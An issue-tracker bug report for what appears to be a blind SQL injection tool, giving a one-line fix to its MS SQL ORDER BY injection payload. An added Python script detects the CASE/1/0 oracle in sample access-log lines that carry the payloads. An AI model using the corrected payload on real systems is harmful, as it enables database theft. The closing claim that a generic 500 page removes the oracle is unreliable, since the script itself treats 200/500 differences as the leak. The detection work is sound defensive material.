What steps will reproduce the problem?
1. Run the program against MS SQL Server with type 2 (order by based injection).

What is the expected output? What do you see instead?
The program should return a valid response in the cases where the AND with the ASCII substring returns 1. The program fails because all responses return HTTP response code 500.

What version of the product are you using? On what operating system?
Using version 2.2 on operating system Linux (Ubuntu 8.10).

Please provide any additional information below.
I have corrected the problem by changing the code on line 216 from:

$val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1 $tail";

to:

$val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end ) $tail";
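From the defender's side, the symptom in this report (a run of HTTP 500s on every probe) is also what this tool's traffic looks like in a web server's access log. The block below is an added example, not code from the project or from the reporter: it parses a few constructed Common Log Format lines, URL-decodes the request target, flags requests that carry the divide-by-zero CASE oracle (`case when ... then 1 else 1/0 end`), and profiles the HTTP status codes per source address. The parameter name `sort`, the IP addresses, the path and the log lines are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format); not taken from the report.
# The first two requests carry the "... end )=1" form from the report and fail with 500;
# the next two carry the corrected "... end )" form, where 200 vs 500 answers the oracle.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Feb/2010:10:00:01 +0000] "GET /list.asp?sort=name,(select+case+when((ASCII(c)+%26+1)%3D0)+then+1+else+1/0+end+)%3D1 HTTP/1.1" 500 312
10.0.0.5 - - [23/Feb/2010:10:00:02 +0000] "GET /list.asp?sort=name,(select+case+when((ASCII(c)+%26+2)%3D0)+then+1+else+1/0+end+)%3D1 HTTP/1.1" 500 312
10.0.0.5 - - [23/Feb/2010:10:00:03 +0000] "GET /list.asp?sort=name,(select+case+when((ASCII(c)+%26+1)%3D0)+then+1+else+1/0+end+) HTTP/1.1" 200 4821
10.0.0.5 - - [23/Feb/2010:10:00:04 +0000] "GET /list.asp?sort=name,(select+case+when((ASCII(c)+%26+2)%3D0)+then+1+else+1/0+end+) HTTP/1.1" 500 312
10.0.0.9 - - [23/Feb/2010:10:00:05 +0000] "GET /list.asp?sort=name HTTP/1.1" 200 4821
"""

# Minimal Common Log Format parser: client, timestamp, method, target, status.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# The boolean oracle used by the tool: CASE WHEN <condition> THEN <n> ELSE 1/0 END.
# Matched on the URL-decoded target so "+" and "%3D" encodings do not hide it.
ORACLE_RE = re.compile(r"\bcase\s+when\b.*?\bthen\s+\d+\s+else\s+1\s*/\s*0\s+end\b", re.I | re.S)


def parse_clf(line):
    """Return a dict for one CLF line, or None if the line does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded_target"] = unquote_plus(rec["target"])
    return rec


def find_oracle_probes(log_text):
    """Return the parsed requests whose decoded target carries the 1/0 CASE oracle."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec and ORACLE_RE.search(rec["decoded_target"]):
            hits.append(rec)
    return hits


def status_profile(hits):
    """Per source IP, count probe requests by HTTP status.

    A run that is 500 on every probe is the symptom in the report (the payload is
    rejected outright); a mix of 200 and 500 means the oracle is answering, i.e.
    the application is leaking one bit per request through its error handling.
    """
    profile = {}
    for rec in hits:
        profile.setdefault(rec["ip"], Counter())[rec["status"]] += 1
    return profile


if __name__ == "__main__":
    probes = find_oracle_probes(SAMPLE_LOG)
    for p in probes:
        print(p["ip"], p["status"], p["decoded_target"])
    print(status_profile(probes))
```

Either status profile is worth an alert: the all-500 variant shows a tool that is probing but failing, the mixed variant shows one that is succeeding. Returning the generic 500 page for every database error, rather than letting the error reach the client, is what removes the oracle on the application side.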
Comment #1
Posted on Feb 23, 2010 by Massive Dog
thnx guru
Status: New
Labels:
Type-Defect
Priority-Medium